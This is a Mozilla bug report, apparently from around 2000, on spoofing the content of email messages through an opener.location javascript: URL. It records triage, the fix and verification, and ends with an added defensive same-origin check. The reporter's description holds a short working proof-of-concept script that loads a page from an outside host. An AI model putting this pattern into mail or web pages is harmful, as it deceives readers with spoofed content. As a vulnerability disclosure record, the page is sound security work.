Spoofing email messages

VERIFIED FIXED in M17

Status

Core
Security
P3
normal
VERIFIED FIXED
18 years ago
17 years ago

People

(Reporter: joro, Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [nsbeta2+], URL)

Attachments

(1 attachment)

(Reporter)

Description

18 years ago
It is possible to spoof email messages by manipulating the location object of
the currently displayed message. This is done by opening a window which does:
opener.location='javascript:s="<H1>Spoofed</H1>"'
The code that must be included in HTML message is:
-------------------------------------------
<SCRIPT>
a=window.open("ht"+"tp://www.nat.bg/~joro/mozilla/openlocation.html");
</SCRIPT>
-------------------------------------------

-----"http://www.nat.bg/~joro/mozilla/openlocation.html"------
<SCRIPT>
setTimeout("opener.location='javascript:s=\"<H1>Spoofed</H1>\"'; ",6000);
// It would be better to use setInterval(), but Mozilla crashes on my box in this case
</SCRIPT>
--------------------------------------------------------------

Updated

18 years ago
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General

Updated

18 years ago
Keywords: beta2

Comment 2

18 years ago
Branch time for M15 has come... and so I'm moving this to M16 (Norris is out 
this week).
Target Milestone: M15 → M16

Updated

18 years ago
Keywords: nsbeta2
(Assignee)

Comment 3

18 years ago
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
(Assignee)

Comment 4

18 years ago
This looks directly related to 37907. The fix is probably the same. I will
verify that the sameOrigin check is being done.
(Assignee)

Updated

18 years ago
Status: NEW → ASSIGNED

Comment 5

18 years ago
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]

Comment 6

18 years ago
Changed QA contact to Cathy.
QA Contact: junruh → czhang
(Assignee)

Comment 7

18 years ago
Created attachment 9041
Proposed Patch - Needs Review
(Assignee)

Comment 8

18 years ago
argh...disregard that patch...posted to the wrong bug.

Comment 9

18 years ago
It is not fixed yet.
http://cathyz/bugs/23516.html
This page opens a window in another domain, http://cathyz2/bugs/1.html;
23516.html is spoofed by the script in 1.html. Same origin is not checked here, I
guess.
Status: ASSIGNED → NEW
(Assignee)

Comment 10

18 years ago
Moving to M17. Not an M16 stopper.
Target Milestone: M16 → M17

Comment 11

18 years ago
Assigning QA to czhang
(Assignee)

Comment 12

18 years ago
Marking Confidential as per jar. jtaylor is attempting to reproduce this bug.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
(Assignee)

Comment 13

18 years ago
I think this one is also dependent on 28443. jtaylor, can you confirm that this
one is fixed as of 7/6?
Depends on: 28443

Comment 14

18 years ago
Looks fixed with 2000070608 build.
(Assignee)

Comment 15

18 years ago
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 16

18 years ago
verified, no spoofing
Status: RESOLVED → VERIFIED
(Assignee)

Comment 17

17 years ago
Opening fixed security bugs to the public.
Group: netscapeconfidential?
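
The same-origin check mentioned in Comment 4 and Comment 9, sketched as an added example (not Mozilla's code and not part of the original bug report): a simplified model in which a `javascript:` URL assigned to another window's location is honoured only when the calling document and the target document share an origin. The function names and the `a.example` / `b.example` URLs are constructed for illustration.

```javascript
// Simplified model of the check; assumption: origins are derived from
// the documents' http(s) URLs as scheme + host + port.
function originOf(urlString) {
  const u = new URL(urlString);
  const defaultPort = { "http:": "80", "https:": "443" }[u.protocol] || "";
  return `${u.protocol}//${u.hostname}:${u.port || defaultPort}`;
}

// URL parsers drop tab/CR/LF anywhere and leading control characters or
// spaces, and match the scheme case-insensitively, so normalise first.
function isScriptUrl(urlString) {
  const cleaned = urlString
    .replace(/[\t\r\n]/g, "")
    .replace(/^[\x00-\x20]+/, "");
  return /^javascript:/i.test(cleaned);
}

// callerUrl:    document whose script performs the assignment
// targetDocUrl: document currently shown in the window being changed
// newLocation:  value assigned to that window's location
function mayNavigate(callerUrl, targetDocUrl, newLocation) {
  if (!isScriptUrl(newLocation)) {
    // The target document is replaced; no script runs inside it.
    return { allowed: true, reason: "ordinary navigation" };
  }
  if (originOf(callerUrl) === originOf(targetDocUrl)) {
    return { allowed: true, reason: "same origin" };
  }
  return {
    allowed: false,
    reason: "javascript: URL would run in a cross-origin document",
  };
}

// Constructed sample inputs mirroring the report's two-page setup.
const message = "http://a.example/message.html";
const popup = "http://b.example/openlocation.html";
const spoof = 'javascript:s="<H1>Spoofed</H1>"';

console.log(mayNavigate(popup, message, spoof));
console.log(mayNavigate("http://a.example:80/x.html", message, spoof));
console.log(mayNavigate(popup, message, " Java\tScript:void 0"));
console.log(mayNavigate(popup, message, "http://b.example/next.html"));
```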